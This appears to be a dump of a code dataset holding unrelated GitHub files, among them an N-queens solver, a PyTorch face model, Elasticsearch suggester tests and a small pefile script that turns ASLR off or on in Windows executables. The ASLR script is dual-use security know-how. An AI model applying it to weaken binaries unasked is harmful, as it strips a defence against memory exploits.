store the n queens positions\r\n                state_queens.remove(i)\r\n        \r\n        conflicts_number = []\r\n        \r\n        for n_queens in new_states_queens: # for each queens configuration we calculate the number\r\n            conflicts_number.append(int(conflict_count_1st(n_queens)/2)) # of conflicts and we store them in a list\r\n        \r\n        indexes_min = find_indices(conflicts_number, min(conflicts_number))\r\n        random_index = random.randint(0,len(indexes_min)-1)\r\n        index = indexes_min[random_index] # we select the index randomly so as not to always select the same configuration\r\n        steps.append(new_states_queens[index])\r\n        current_state.queens = copy.deepcopy(new_states_queens[index]) # we change the queens position of the current state \r\n                                                                       # to the one that causes the fewest conflicts \r\n    return len(steps)\r\n    \r\n# Second Version\r\n\r\n@profile\r\ndef second_version(initial_state, steps):\r\n    current_state = initial_state\r\n    while conflict_count_2nd(current_state) != 0: # it keeps running while the number of conflicts is different from 0\r\n        \r\n        new_states_queens = [] # here we store all the possible new state queen's configurations\r\n        \r\n        for q in current_state.queens: # we do this for each one of the n queens\r\n            moved_q = move_queen(q) # call the move_queen function\r\n            \r\n            for i in moved_q: # for every queen's possible new position we create a configuration\r\n                state_queens = []\r\n                for p in range(0,n):\r\n                    if p != q[0]:\r\n                        state_queens.append(current_state.queens[p])\r\n                state_queens.insert(q[0],i)\r\n                new_states_queens.append(state_queens) # we store the n queens position\r\n        \r\n        conflicts_number = []\r\n        \r\n        for n_queens in new_states_queens: # we calculate and store the number of conflicts for every\r\n            new_state = state(n_queens,n) # different configuration with the improved version of conflict counting\r\n            n_conflicts = copy.deepcopy(conflict_count_2nd(new_state)) \r\n            conflicts_number.append(n_conflicts/2) \r\n        \r\n        steps.append(new_states_queens[conflicts_number.index(min(conflicts_number))])\r\n        current_state.queens = new_states_queens[conflicts_number.index(min(conflicts_number))] # we change the queens position of the current state\r\n                                                                                                # to the one that causes the fewest conflicts\r\n    return len(steps)\r\n\r\n# Third 
version\n\n@profile\ndef third_version(initial_state, steps):\n current_state = initial_state\n while conflict_count_2nd(current_state) != 0: # it keeps running while the number of conflicts is different than 0\n \n flag = False # flag that indicates if it has found a lower conflicts state\n equal_states = []\n \n for q in current_state.queens: # we do this for each one of the n queens\n if flag:\n break\n moved_q = move_queen(q) # call the move_queen function\n state_queens = copy.deepcopy(current_state.queens)\n state_queens.remove(q) # removing q's original position\n \n for i in moved_q: # for every queen's possible new position we create a new configuration\n state_queens.insert(q[0],i)\n new_state = state(state_queens,n)\n n_conflicts = copy.deepcopy(conflict_count_2nd(new_state)) # counts the conflicts for that configuration\n if n_conflicts < conflict_count_2nd(current_state): # if it's lower than the current conflicts number\n steps.append(state_queens) \n current_state.queens = copy.deepcopy(state_queens) # it becomes the new current state's configuration \n flag = True \n break\n if n_conflicts == conflict_count_2nd(current_state): # if it's equal to the current conflicts number\n equal_states.append(copy.deepcopy(state_queens)) # it saves this configuration in a list\n state_queens.remove(i)\n \n if not flag: # if a lower conflicts configuration was not found\n random_index = random.randint(0,len(equal_states)-1) \n steps.append(equal_states[random_index]) \n current_state.queens = copy.deepcopy(equal_states[random_index]) # it sets a random configuration selected from the equal conflicts number configuration \n \n return(len(steps)) \n\nn = 4\n \n#Genariting randomly the initial state \nqueens = []\nfor x in range (0,n):\n xth_queen = (x,random.randint(0,n-1))\n queens.append(xth_queen)\n\n \ninitial_state = state(queens,n) # Declaring the initial state\nsteps = [queens]\n\nprint(third_version(initial_state, steps)) # calls the algorithm ","repo_name":"SebastianCastro23/N_Queens","sub_path":"Hill_Climbing.py","file_name":"Hill_Climbing.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17475850440","text":"from turtle import forward\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .efficientnet_pytorch.model import EfficientNet as Model\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nuse_gpu = torch.cuda.is_available()\n\nclass crop_model(nn.Module):\n def __init__(self, in_channel, num_classes) -> None:\n super().__init__()\n self.flatten = torch.nn.Flatten()\n self.line = torch.nn.Linear(18, 2)\n self.model = densenet(in_channel, num_classes, need_return_dic = False)\n \n\n def build_ans(self,x):\n return {\n \"pred_logits\":x,\n }\n\n def forward(self, input):\n try:\n p, c, _, _ = input[0].size()\n except Exception as e:\n print(e)\n print(len(input), input[0].size())\n # ans_ = torch.zeros(p,1)\n # if(use_gpu):\n # ans_ = ans_.to(device)\n ans_ = []\n for i in input:\n ans = self.model(i)\n ans_.append(ans)\n # ans_ = torch.mul( ans_ ,ans)\n a = torch.stack( ans_, 1)\n\n #print(a.size())\n a = self.flatten(a)\n #print(a.size())\n ans_ = self.line(a)\n #print(ans_.size())\n return self.build_ans(ans_)\n\nclass crop_model1(nn.Module):\n def __init__(self, a,b, channel) -> None:\n super().__init__()\n self.flatten = torch.nn.Flatten()\n self.line = torch.nn.Linear(32, 2)\n self.model = Model(a,b,9)\n if(use_gpu):\n 
self.model.to(device)\n\n def build_ans(self,x):\n return {\n \"pred_logits\":x,\n }\n\n def forward(self, input):\n try:\n p, c, _, _ = input[0].size()\n except Exception as e:\n print(e)\n print(len(input), input[0].size())\n #method 1:\n # ans_ = torch.zeros(p,1)\n # if(use_gpu):\n # ans_ = ans_.to(device)\n # ans_ = []\n # for i in input:\n # ans = self.model(i)\n # ans_.append(ans)\n # # ans_ = torch.mul( ans_ ,ans)\n # a = torch.stack( ans_, 1)\n #method 2:\n input = self.crop_tensor(input)\n a = self.model(input)\n \n print(a.size())\n a = self.flatten(a)\n #print(a.size())\n ans_ = self.line(a)\n #print(ans_.size())\n return self.build_ans(ans_)\n\n def crop_tensor(self, image_pack, scale = 4):\n _, _, w, h = image_pack.size()\n a = int(w/scale)\n b = int(h/scale)\n t = torch.split(image_pack, a, dim = 2)\n ans = []\n for i in t:\n for j in torch.split(i,b, dim=3):\n ans.append(j)\n d = torch.cat(ans,1)\n return d","repo_name":"aoxipo/fakefacedetect","sub_path":"model/Ceffici.py","file_name":"Ceffici.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31888700970","text":"import os\nimport pefile\nimport argparse\nimport sys\n\nbanner = ''' \n @@@@@@ @@@@@@ @@@ @@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ \n@@@@@@@@ @@@@@@@ @@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@ \n@@! @@@ !@@ @@! @@! @@@ @@! @@! @@@ @@! @@@ @@! \n!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! @!@ !@! \n@!@!@!@! !!@@!! @!! @!@!!@! @!! @!@ !@! @!@ !@! @!! \n!!!@!!!! !!@!!! !!! !!@!@! !!! !@! !!! !@! !!! !!! \n!!: !!! !:! !!: !!: :!! !!: !!: !!! !!: !!! !!: \n:!: !:! !:! :!: :!: !:! :!: :!: !:! :!: !:! :!: \n:: ::: :::: :: :: :::: :: ::: ::::::::::::: :: ::::: :: ::::: :: :: :::: \n : : : :: : : : :: : : : : : ::::::::::::: : : : : : : : : :: : : \n\n \n \n \n \n ''' \n\n\n\ndef has_aslr_enabled(pe):\n \"\"\"Verifica se o ASLR está ativado para o arquivo PE fornecido.\"\"\"\n return bool(pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"])\n\ndef disable_aslr(file_path):\n \"\"\"Desativa o ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if not has_aslr_enabled(pe):\n print(\"ASLR já está desativado para este arquivo.\\n\\n\\n\")\n return\n\n backup_and_modify(file_path, pe, False)\n\ndef enable_aslr(file_path):\n \"\"\"Ativa o ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if has_aslr_enabled(pe):\n print(\"ASLR já está ativado para este arquivo.\\n\\n\\n\")\n return\n\n backup_and_modify(file_path, pe, True)\n\ndef backup_and_modify(file_path, pe, enable):\n \"\"\"Faz backup e modifica o ASLR do arquivo PE fornecido.\"\"\"\n backup_dir = \"backup\"\n if not os.path.exists(backup_dir):\n os.makedirs(backup_dir)\n\n backup_file_path = os.path.join(backup_dir, os.path.basename(file_path))\n with open(file_path, \"rb\") as original_file, open(backup_file_path, \"wb\") as backup_file:\n backup_file.write(original_file.read())\n\n if enable:\n pe.OPTIONAL_HEADER.DllCharacteristics |= pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"]\n else:\n pe.OPTIONAL_HEADER.DllCharacteristics &= ~pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"]\n\n modified_file_path = os.path.splitext(file_path)[0] + (\"_aslr_on\" if enable else \"_aslr_off\") + os.path.splitext(file_path)[1]\n pe.write(filename=modified_file_path)\n\n print(f\"Backup salvo em: {backup_file_path}\")\n print(f\"\\n\\n\\nArquivo modificado salvo 
em: {modified_file_path}\")\n\ndef verify_aslr(file_path):\n \"\"\"Verifica o status do ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if has_aslr_enabled(pe):\n print(\"ASLR ATIVADO\\n\\n\\n\")\n else:\n print(\"ASLR DESATIVADO\\n\\n\\n\")\n\nif __name__ == \"__main__\":\n print(banner)\n parser = argparse.ArgumentParser(description=\"Ferramenta para verificar, desativar e ativar ASLR em arquivos PE.\", add_help=False)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-f\", \"--file\", help=\"Caminho do arquivo PE para DESATIVAR o ASLR.\", type=str)\n group.add_argument(\"-v\", \"--verify\", help=\"Caminho do arquivo PE para VERIFICAR o status do ASLR.\", type=str)\n group.add_argument(\"-ON\", help=\"Caminho do arquivo PE para ATIVAR o ASLR.\", type=str)\n group.add_argument(\"-h\", \"-help\", \"--help\", action=\"help\", default=argparse.SUPPRESS, help=\"Mostra essa mensagem de ajuda e sai.\")\n\n try:\n args = parser.parse_args()\n except SystemExit:\n print(\"Erro: Nenhum argumento fornecido. Use '-h' para ver as opções disponíveis.\\n\\n\\n\")\n sys.exit(1)\n\n if args.file:\n disable_aslr(args.file)\n elif args.verify:\n verify_aslr(args.verify)\n elif args.ON:\n enable_aslr(args.ON)\n","repo_name":"carlosadrianosj/ASLR_TOOL","sub_path":"aslr_tool.py","file_name":"aslr_tool.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19052768786","text":"from flask import Flask, render_template\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\nimport io\r\nimport base64\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\n\r\ndef tspVisualization():\r\n # Function to close the window\r\n def close_window():\r\n window.destroy()\r\n # Close the matplotlib figure\r\n plt.close(fig)\r\n\r\n # Function to plot the TSP tour\r\n def plot_tour(points, tour):\r\n global fig # Declare fig as a global variable\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n ax.scatter(points[:, 0], points[:, 1], color='blue', s=50)\r\n ax.plot(points[tour + [tour[0]], 0], points[tour + [tour[0]], 1], color='red', linewidth=2)\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_title('TSP Tour')\r\n ax.grid(True)\r\n\r\n # Create a canvas to display the matplotlib figure in the Tkinter window\r\n canvas = FigureCanvas(fig)\r\n canvas.draw()\r\n\r\n # Save the plot to a bytes buffer\r\n buffer = io.BytesIO()\r\n canvas.print_png(buffer)\r\n buffer.seek(0)\r\n\r\n # Encode the bytes buffer as a base64 string\r\n plot_data = base64.b64encode(buffer.getvalue()).decode('utf-8')\r\n\r\n return plot_data\r\n\r\n # Example data\r\n points = np.array([[0, 0], [1, 3], [2, 1], [4, 2], [3, 0]])\r\n\r\n # Example tour\r\n tour = [0, 1, 3, 2, 0]\r\n\r\n plot_data = plot_tour(points, tour)\r\n\r\n return plot_data\r\n\r\n@app.route('/')\r\ndef index():\r\n plot_data = tspVisualization()\r\n return render_template('tsp_visualization.html', plot_data=plot_data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"mesteri15micro/disszertaciosDolgozat","sub_path":"tsp_visualization_2.py","file_name":"tsp_visualization_2.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8306345308","text":"import os\nimport sys\nimport glob\n\nimport inspect\n\ndef load_modules(filemask='*.py', 
ignore_list=('__init__.py', )):\n \"\"\"\n This loads all modules from the formatters directory\n \"\"\"\n modules = {}\n dirname = os.path.dirname(__file__)\n\n if dirname:\n filemask = os.path.join(dirname, filemask)\n\n for fn in glob.glob(filemask):\n fn = os.path.split(fn)[1]\n\n if fn in ignore_list:\n continue\n\n fn = os.path.splitext(fn)[0]\n modules[fn] = __import__(fn, globals(), locals())\n\n return modules\n\n\ndef get_formatter(formatter_class):\n \"\"\"\n This will generate HTML for a specific markup language but will not\n highlight source code\n \"\"\"\n cls = ''\n\n if formatter_class == 'rst':\n cls = 'RestructuredTextFormatter'\n elif formatter_class == 'markdown':\n cls = 'MarkdownFormatter'\n else:\n cls = formatter_class\n\n load_modules()\n current_module = sys.modules[__name__]\n formatter = get_module_classes(current_module, cls)\n\n return formatter\n\n\ndef get_module_classes(module, formatter_class):\n \"\"\"\n Recursively searches through all modules looking for the class\n that we are asking for\n \"\"\"\n for name, obj in inspect.getmembers(module, inspect.isclass):\n if obj.__name__ == formatter_class:\n return obj\n\n # Didn't find the class we want on that module, loop thorugh\n # its child modules\n for name, obj in inspect.getmembers(module, inspect.ismodule):\n if obj.__name__.startswith(__name__):\n cls = get_module_classes(obj, formatter_class)\n\n if cls:\n return cls\n","repo_name":"eventray-archive/hiero","sub_path":"hiero/formatters/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"14169924009","text":"# coding: utf-8\n\"\"\"\nTest suggestions backend.\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport unittest\n\nfrom django.core.management import call_command\nfrom django.urls import reverse\n\nimport pytest\n\nfrom rest_framework import status\n\nimport factories\n\nfrom ..versions import (\n ELASTICSEARCH_GTE_5_0,\n ELASTICSEARCH_GTE_6_0,\n ELASTICSEARCH_GTE_7_0,\n)\nfrom .base import BaseRestFrameworkTestCase\nfrom .data_mixins import AddressesMixin\n\n__title__ = 'django_elasticsearch_dsl_drf.tests.test_suggesters'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n 'TestContextSuggesters',\n 'TestSuggesters',\n 'TestSuggestersEmptyIndex',\n)\n\n\n@pytest.mark.django_db\nclass TestSuggesters(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test suggesters.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n super(TestSuggesters, cls).setUpClass()\n\n cls.publishers = []\n cls.publishers.append(\n factories.PublisherFactory(\n name='Addison–Wesley',\n city='Brighton & Hove',\n state_province='East Midlands',\n country='Armenia',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Adis International',\n city='Bristol',\n state_province='East of England',\n country='Argentina',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Atlantic Books',\n city='Cardiff',\n state_province='North East',\n country='Belgium',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Atlas Press',\n city='Carlisle',\n state_province='North West',\n country='Belarus',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Book League of America',\n city='Chelmsford',\n 
state_province='South East',\n country='Burkina Faso',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Book Works',\n city='Chester',\n state_province='South West',\n country='Burundi',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Booktrope',\n city='Chichester',\n state_province='West Midlands',\n country='Netherlands',\n )\n )\n\n cls.publishers_url = reverse(\n 'publisherdocument-suggest',\n kwargs={}\n )\n\n cls.books = []\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Bbbb',\n summary='`Twas brillig, and the slithy toves '\n 'Did gyre and gimble in the wabe. '\n 'All mimsy were the borogoves '\n 'And the mome raths outgrabe.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Cccc',\n summary='\"Beware the Jabberwock, my son! '\n 'The jaws that bite, the claws that catch! '\n 'Beware the Jubjub bird, and shun '\n 'The frumious Bandersnatch!',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Dddd',\n summary='He took his vorpal sword in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n\n cls.books += factories.BookFactory.create_batch(\n 10,\n publisher__name='Oxford University Press',\n publisher__city='Yerevan',\n publisher__state_province='Ararat',\n publisher__country='Ireland',\n )\n\n cls.books_url = reverse(\n 'bookdocument-suggest',\n kwargs={}\n )\n\n cls.books_suggest_context_url = reverse(\n 'bookdocument_frontend-suggest',\n kwargs={}\n )\n\n cls.authors = []\n cls.authors.append(\n factories.AuthorFactory(\n name='John Doe',\n salutation='Aaa Bbb',\n )\n )\n cls.authors.append(\n factories.AuthorFactory(\n name='Jane Doe',\n salutation='Aaa Ccc',\n )\n )\n cls.authors.append(\n factories.AuthorFactory(\n name='Armen Doe',\n salutation='Bbb Ccc',\n )\n )\n\n cls.authors_url = reverse(\n 'authordocument-suggest',\n kwargs={}\n )\n\n cls.created_addresses()\n\n cls.sleep()\n call_command('search_index', '--rebuild', '-f')\n\n def _test_suggesters(self, test_data, url):\n \"\"\"Test suggesters.\"\"\"\n self.authenticate()\n\n data = {}\n\n for _suggester_field, _test_cases in test_data.items():\n\n for _test_case, _expected_results in _test_cases.items():\n _url = url + '?' 
+ _suggester_field + '=' + _test_case\n # Check if response now is valid\n response = self.client.get(\n _url,\n data\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(_suggester_field, response.data)\n _unique_options = list(set([\n __o['text']\n for __o\n in response.data[_suggester_field][0]['options']\n ]))\n self.assertEqual(\n len(_unique_options),\n len(_expected_results),\n (\n _url,\n _test_case,\n _expected_results,\n _unique_options\n )\n )\n\n def test_suggesters_completion(self):\n \"\"\"Test suggesters completion.\"\"\"\n # Testing publishers\n test_data = {\n 'name_suggest__completion': {\n 'Ad': ['Addison–Wesley', 'Adis International'],\n 'Atl': ['Atlantic Books', 'Atlas Press'],\n 'Boo': ['Book League of America', 'Book Works', 'Booktrope'],\n },\n 'country_suggest__completion': {\n 'Arm': ['Armenia'],\n 'Ar': ['Armenia', 'Argentina'],\n 'Bel': ['Belgium', 'Belarus'],\n 'Bur': ['Burkina Faso', 'Burundi'],\n 'Net': ['Netherlands'],\n 'Fra': [],\n }\n }\n # Testing default suggesters as well\n test_data.update(\n {\n 'name_suggest': test_data['name_suggest__completion'],\n 'country_suggest': test_data['country_suggest__completion'],\n }\n )\n self._test_suggesters(test_data, self.publishers_url)\n\n # Testing books\n test_data = {\n 'title_suggest__completion': {\n 'Aaa': ['Aaaaa Bbbb', 'Aaaaa Cccc', 'Aaaaa Dddd'],\n 'Bbb': [],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n # Testing authors\n test_data = {\n 'salutation.suggest__completion': {\n 'Aaa': ['Aaa Bbb', 'Aaa Ccc'],\n 'Bbb': ['Bbb Ccc'],\n 'Hhh': [],\n },\n }\n self._test_suggesters(test_data, self.authors_url)\n\n def test_suggesters_completion_no_args_provided(self):\n \"\"\"Test suggesters completion with no args provided.\"\"\"\n data = {}\n # Check if response now is valid\n response = self.client.get(self.publishers_url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_suggesters_term(self):\n \"\"\"Test suggesters term.\"\"\"\n # Testing books\n test_data = {\n 'summary_suggest__term': {\n 'borogovse': ['borogov'],\n 'Tumtus': ['tumtum'],\n 'Jabberwok': ['jabberwock'],\n 'tovse': ['tove', 'took', 'twas'],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n def test_suggesters_phrase(self):\n \"\"\"Test suggesters phrase.\"\"\"\n # Testing books\n test_data = {\n 'summary_suggest__phrase': {\n 'slith tovs': ['slithi tov'],\n 'mimsy boroto': ['mimsi borogov'],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n def test_nested_fields_suggesters_completion(self):\n \"\"\"Test suggesters completion for nested fields.\"\"\"\n # Testing cities and countries\n test_data = {\n 'city_suggest__completion': {\n 'Ye': ['Yerevan', 'Yeovil'],\n 'Yer': ['Yerevan'],\n 'Ams': ['Amsterdam'],\n 'Du': ['Dublin'],\n 'Ne': [],\n },\n 'country_suggest__completion': {\n 'Arm': ['Armenia'],\n 'Ar': ['Armenia', 'Argentina'],\n 'Re': ['Republic of Ireland'],\n 'Net': ['Netherlands'],\n 'Fra': [],\n }\n }\n self._test_suggesters(test_data, self.addresses_suggest_url)\n\n\n@pytest.mark.django_db\nclass TestSuggestersEmptyIndex(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test suggesters on empty index.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n cls.authors_url = reverse(\n 'authordocument-suggest',\n kwargs={}\n )\n\n cls.sleep()\n # Suggest on empty index\n call_command('search_index', '--delete', '-f')\n call_command('search_index', '--create', 
'-f')\n\n def test_suggesters_on_empty_index(self):\n \"\"\"Test suggesters phrase.\"\"\"\n response = self.client.get(\n self.authors_url + '?name_suggest__completion=Ad',\n {}\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n if ELASTICSEARCH_GTE_7_0:\n self.assertTrue(\n bool(response.data.get('name_suggest__completion'))\n )\n elif ELASTICSEARCH_GTE_6_0:\n self.assertFalse(bool(response.data))\n else:\n self.assertFalse(\n bool(response.data.get('name_suggest__completion'))\n )\n\n\n@unittest.skipIf(not ELASTICSEARCH_GTE_5_0, 'ES >=5.x only')\n@pytest.mark.django_db\nclass TestContextSuggesters(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test context suggesters.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n # Books\n cls.books = []\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Bbbb',\n summary='`Twas brillig, and the slithy toves '\n 'Did gyre and gimble in the wabe. '\n 'All mimsy were the borogoves '\n 'And the mome raths outgrabe.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Cccc',\n summary='\"Beware the Jabberwock, my son! '\n 'The jaws that bite, the claws that catch! '\n 'Beware the Jubjub bird, and shun '\n 'The frumious Bandersnatch!',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Dddd',\n summary='He took his vorpal sword in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Eeee',\n summary='She took his zorpal blade in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n # publisher__name='Mario',\n # publisher__country='US',\n )\n )\n\n cls.books += factories.BookFactory.create_batch(\n 10,\n publisher__name='Oxford University Press',\n publisher__city='Yerevan',\n publisher__state_province='Ararat',\n publisher__country='Ireland',\n )\n\n cls.books_suggest_context_url = reverse(\n 'bookdocument_frontend-suggest',\n kwargs={}\n )\n\n # Addresses\n cls.addresses = []\n cls.addresses.append(\n factories.AddressFactory(\n street='Halabyan',\n city__name='Yerevan',\n latitude=40.0742719,\n longitude=44.1930605,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hambardzumyan',\n city__name='Yerevan',\n latitude=40.01,\n longitude=44.01,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Haghartsin',\n city__name='Yerevan',\n latitude=39.92,\n longitude=43.92,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hamazaspyan',\n city__name='Tatev',\n latitude=39.3793612,\n longitude=46.2480006,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Harazatyan',\n city__name='Tatev',\n latitude=39.3793612,\n longitude=46.2480006,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hardewijk',\n city__name='Groningen',\n latitude=53.2246892,\n longitude=6.56429,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Haringstraat',\n city__name='Groningen',\n latitude=53.2246892,\n longitude=6.56429,\n )\n )\n\n cls.addresses_suggest_context_url = reverse(\n 'addressdocument_frontend-suggest',\n kwargs={}\n )\n\n cls.sleep()\n 
call_command('search_index', '--rebuild', '-f')\n\n def _test_suggesters_completion_context(self, test_data, url):\n \"\"\"Test suggesters completion context.\"\"\"\n self.authenticate()\n\n data = {}\n\n for _suggester_field, _test_cases in test_data.items():\n\n for _test_case, _test_data in _test_cases.items():\n _url = url + '?' + _suggester_field + '=' + _test_case\n for _query_param, _value in _test_data['filters'].items():\n _url += '&{}={}'.format(_query_param, _value)\n # Check if response now is valid\n response = self.client.get(\n _url,\n data\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(_suggester_field, response.data)\n _unique_options = list(set([\n __o['text']\n for __o\n in response.data[_suggester_field][0]['options']\n ]))\n self.assertEqual(\n len(_unique_options),\n len(_test_data['expected_results']),\n (\n _url,\n _test_case,\n _test_data['expected_results'],\n _unique_options\n )\n )\n\n def test_suggesters_completion_context(self):\n \"\"\"Test suggesters completion context.\"\"\"\n # Testing books\n test_data = {\n 'title_suggest_context': {\n 'Ccc': {\n 'expected_results': [\n 'Ccccc Bbbb',\n 'Ccccc Cccc',\n 'Ccccc Dddd',\n ],\n 'filters': {\n 'title_suggest_publisher': 'Antares',\n }\n },\n },\n }\n self._test_suggesters_completion_context(\n test_data,\n self.books_suggest_context_url\n )\n\n # Testing addresses\n test_data = {\n 'street_suggest_context': {\n 'Ha': {\n 'expected_results': [\n 'Halabyan',\n 'Hambardzumyan',\n 'Haghartsin',\n 'Hamazaspyan',\n 'Harazatyan',\n ],\n 'filters': {\n 'title_suggest_loc': (\n '40__44__1000km'\n if ELASTICSEARCH_GTE_6_0\n else '40__44'\n ),\n }\n },\n },\n }\n self._test_suggesters_completion_context(\n test_data,\n self.addresses_suggest_context_url\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/tests/test_suggesters.py","file_name":"test_suggesters.py","file_ext":"py","file_size_in_byte":18645,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"36500544563","text":"t = int(input())\n\nfor _ in range(t):\n \n entrada = input()\n \n col = ord(entrada[0])\n row = ord(entrada[1])\n #- ord('0')\n\n for i in range(1,10):\n if ord(chr('a')) + i - 1 != col:\n print(chr(ord('a') + i - 1), row)\n if i != row:\n print(col, i) \n","repo_name":"RaulMyron/programacao-competitiva","sub_path":"contests/atcoders/div3/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29126084504","text":"# coding: utf-8\n\n\"\"\"\n CardPay REST API\n\n Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see changelog section. 
# noqa: E501\n\n OpenAPI spec version: 3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cardpay.model.payment_response_card_account import (\n PaymentResponseCardAccount,\n) # noqa: F401,E501\nfrom cardpay.model.recurring_customer import RecurringCustomer # noqa: F401,E501\nfrom cardpay.model.recurring_response_recurring_data import (\n RecurringResponseRecurringData,\n) # noqa: F401,E501\nfrom cardpay.model.transaction_response_merchant_order import (\n TransactionResponseMerchantOrder,\n) # noqa: F401,E501\n\n\nclass RecurringCallback(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n \"callback_time\": \"str\",\n \"card_account\": \"PaymentResponseCardAccount\",\n \"customer\": \"RecurringCustomer\",\n \"merchant_order\": \"TransactionResponseMerchantOrder\",\n \"payment_method\": \"str\",\n \"recurring_data\": \"RecurringResponseRecurringData\",\n }\n\n attribute_map = {\n \"callback_time\": \"callback_time\",\n \"card_account\": 